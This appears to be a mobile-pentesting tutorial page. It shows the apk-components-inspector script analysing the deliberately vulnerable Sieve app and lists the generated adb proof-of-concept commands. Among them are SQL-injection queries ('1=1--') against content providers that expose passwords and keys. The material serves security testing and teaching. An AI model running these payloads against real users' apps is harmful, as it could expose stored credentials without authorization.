Skip to main content

Automating Attack Payloads

The apk-components-inspector is a Python3 script that analyzes an APK file, lists the exported app components, and generates proof-of-concept payloads needed to attack the application. While the script does an amazing job at generating these payloads, they may require some slight modifications by the tester to get them to fully work. Still, they work most of the time and will reduce the time needed to get a functional payload.

Here are the options for the script:

% python3 apk-components-inspector.py            
╭──────────────── APK Components Inspector ────────────────╮
│ APK Components Inspector                                 │
│ v1.1 by Sandeep Wawdane                                  │
│                                                          │
│ Usage: python3 apk-components-inspector.py <apk_file>    │
│ Options:                                                 │
│   -o, --output    Save results to JSON file              │
│   -v, --verbose   Enable verbose output                  │
│   -q, --quiet     Suppress progress messages only        │
│   -c, --cleanup   Remove decompiled files after analysis │
│   -a, --all       Include non-exported activities        │
╰──────────────────────────────────────────────────────────╯

Here is an example of the script using the Sieve application. It starts off with the analysis of the APK file.

% python apk-components-inspector.py -o sieve_output.txt sieve.apk 
Decompiling sieve.apk...
✓ Successfully decompiled to sieve_decompiled
Parsing AndroidManifest.xml...
Analyzing components...
Analyzing activity (exported): com.withsecure.example.sieve.activity.MainLoginActivity
Analyzing activity (exported): com.withsecure.example.sieve.activity.FileSelectActivity
Analyzing activity (exported): com.withsecure.example.sieve.activity.PWList
Analyzing service (exported): com.withsecure.example.sieve.service.AuthService
Analyzing service (exported): com.withsecure.example.sieve.service.CryptoService
Analyzing receiver (exported): androidx.profileinstaller.ProfileInstallReceiver
Analyzing provider (exported): com.withsecure.example.sieve.provider.DBContentProvider
Analyzing provider (exported): com.withsecure.example.sieve.provider.FileBackupProvider
Generating exploits...
Note: Receiver androidx.profileinstaller.ProfileInstallReceiver requires permission android.permission.DUMP,
skipping.

✓ Results saved to: sieve_output.txt
───────────────────────────────────────────────────────────────────────────
Package: com.withsecure.example.sieve
Exported Components: 8
───────────────────────────────────────────────────────────────────────────
 Component               Type      Status    Exploits 
 MainLoginActivity       activity  exported  3        
 FileSelectActivity      activity  exported  1        
 PWList                  activity  exported  1        
 AuthService             service   exported  2        
 CryptoService           service   exported  2        
 ProfileInstallReceiver  receiver  exported  0        
 DBContentProvider       provider  exported  10       
 FileBackupProvider      provider  exported  2        
───────────────────────────────────────────────────────────────────────────

Following that, it generates the proof-of-concept payloads for each component. The first set are the Activities.

# Activities ADB Commands:

MainLoginActivity (exported)
  # Action: android.intent.action.MAIN
  adb shell am start -n com.withsecure.example.sieve/com.withsecure.example.sieve.activity.MainLoginActivity -a android.intent.action.MAIN -c android.intent.category.LAUNCHER
  # Extras: com.withsecure.example.sieve.PIN(string)
  adb shell am start -n com.withsecure.example.sieve/com.withsecure.example.sieve.activity.MainLoginActivity --es com.withsecure.example.sieve.PIN "test_string"
  # singleTask mode
  adb shell am start -n com.withsecure.example.sieve/com.withsecure.example.sieve.activity.MainLoginActivity --activity-clear-task

FileSelectActivity (exported)
  adb shell am start -n com.withsecure.example.sieve/com.withsecure.example.sieve.activity.FileSelectActivity

PWList (exported)
  # Extras: com.withsecure.example.sieve.KEY(string), _id(string)
  adb shell am start -n com.withsecure.example.sieve/com.withsecure.example.sieve.activity.PWList --es com.withsecure.example.sieve.KEY "test_string" --es _id "test_string"

Next, are the Services.

# Services ADB Commands:

AuthService (exported)
  adb shell am startservice -n com.withsecure.example.sieve/com.withsecure.example.sieve.service.AuthService
  # Foreground service
  adb shell am start-foreground-service -n com.withsecure.example.sieve/com.withsecure.example.sieve.service.AuthService

CryptoService (exported)
  adb shell am startservice -n com.withsecure.example.sieve/com.withsecure.example.sieve.service.CryptoService
  # Foreground service
  adb shell am start-foreground-service -n com.withsecure.example.sieve/com.withsecure.example.sieve.service.CryptoService

Following that, are the Providers.

# Provider ADB Commands:

DBContentProvider (exported)
  # Query
  adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/selectionArgs"
  # Query with injection payload
  adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/selectionArgs" --where "1=1--"
  # Query
  adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/Keys"
  # Query with injection payload
  adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/Keys" --where "1=1--"
  # Query
  adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/Passwords"
  # Query with injection payload
  adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/Passwords" --where "1=1--"
  # Query
  adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/values"
  # Query with injection payload
  adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/values" --where "1=1--"
  # Query
  adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/Keys/*"
  # Query with injection payload
  adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/Keys/*" --where "1=1--"

FileBackupProvider (exported)
  # Query
  adb shell content query --uri "content://com.withsecure.example.sieve.provider.FileBackupProvider"
  # Query with injection payload
  adb shell content query --uri "content://com.withsecure.example.sieve.provider.FileBackupProvider" --where "1=1--"

To automatically have the script cleanup the directory from apktool, you can use the -c option. Using the -o option allows you to save the data in JSON format on your computer. It will also print the text to stdout in your terminal.

% python apk-components-inspector.py -c -o sieve_output.txt sieve.apk

References

https://github.com/thecybersandeep/apk-components-inspector